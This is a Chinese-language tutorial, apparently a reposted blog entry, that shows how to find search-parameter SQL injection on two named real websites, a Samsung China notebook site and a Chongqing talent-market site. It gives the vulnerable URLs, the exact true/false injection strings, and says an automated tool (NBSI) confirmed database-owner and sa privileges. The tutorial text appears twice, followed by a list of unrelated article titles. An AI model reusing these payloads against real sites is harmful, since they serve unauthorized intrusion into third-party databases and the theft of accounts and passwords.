注入三星和重庆人才市场
来源:互联网 发布:书法练字软件 编辑:程序博客网 时间:2024/04/28 16:18
大家好 今天给大家做的教程是运用搜索性注入找到网站注入漏洞的方法 我是看了勇哥文章很受启发,想到有时打开网页的时候参数中一般不带有搜索的参数的,怎么办么?手工改造阿。呵呵
-----------------------------------------------------------------------
一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
用nbsi吧 刚才就开始了 等等 DB_OWNER的权限
----------------------------------------------------------------------
然后再看看重庆人才市场的看看他的注入的页面
http://www.hrm.cq.cn/news.aspx?page=0&bt=安全
我们输入 安全%'and 1=1 and '%'='
在输入 安全%'and 1=2 and '%'='
看见了吧 两个页面是不一样的
特征字选 返回真页面有而返回加页面没有的 就选"通知"吧
因为时间关系 已经开始扫了
看见了吧 可是sa的权限阿 好多表呢 呵呵
因为只是检测一下,为大家提供一种思路 下面就是暴账号和密码
我就就不做了
-----------------------------------------------------------------------
一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
用nbsi吧 刚才就开始了 等等 DB_OWNER的权限
----------------------------------------------------------------------
然后再看看重庆人才市场的看看他的注入的页面
http://www.hrm.cq.cn/news.aspx?page=0&bt=安全
我们输入 安全%'and 1=1 and '%'='
在输入 安全%'and 1=2 and '%'='
看见了吧 两个页面是不一样的
特征字选 返回真页面有而返回加页面没有的 就选"通知"吧
因为时间关系 已经开始扫了
看见了吧 可是sa的权限阿 好多表呢 呵呵
因为只是检测一下,为大家提供一种思路 下面就是暴账号和密码
我就就不做了
- 注入三星和重庆人才市场
- 重庆和成都的口水战
- 江苏人才市场联系电话
- 三星
- 三星微软宣布合作:让Win10和三星家电通信
- 注入攻击-SQL注入和代码注入
- 重庆搜索科技和传媒学院合作共建云媒资实验室
- 徐州光辉人才市场招聘会
- 中国人才市场的怪现象
- 人才市场之行的感想
- 三星和Google再联手:Nexus TV?
- VisionMobile:Apple和三星利润的秘诀
- 《重庆森林》
- 重庆日全食
- 重庆 火炉
- 再见,重庆
- 重庆高温
- 重庆体检
- [SharePoint]Group And SiteGroup
- 翻译Qt4教程:C++ GUI Programming with Qt 4
- 利用WEBSHELL直接进入后台!
- C#常用的文件操作
- LoadRuner中的事务
- 注入三星和重庆人才市场
- Google App Engine 中文版入门指南
- 有关jsp的字符集问题,filter的配置问题
- Could not find stored procedure 'sp_sdidebug'
- C++ GUI Programming with Qt 4 - 10.3 实现自定义模型
- bingo!
- C++ GUI Programming with Qt 4 - 10.4 实现自定义代理(delegate)
- 结构(Struct)
- 发展趋势调查 SOA在整个IT行业内广泛应用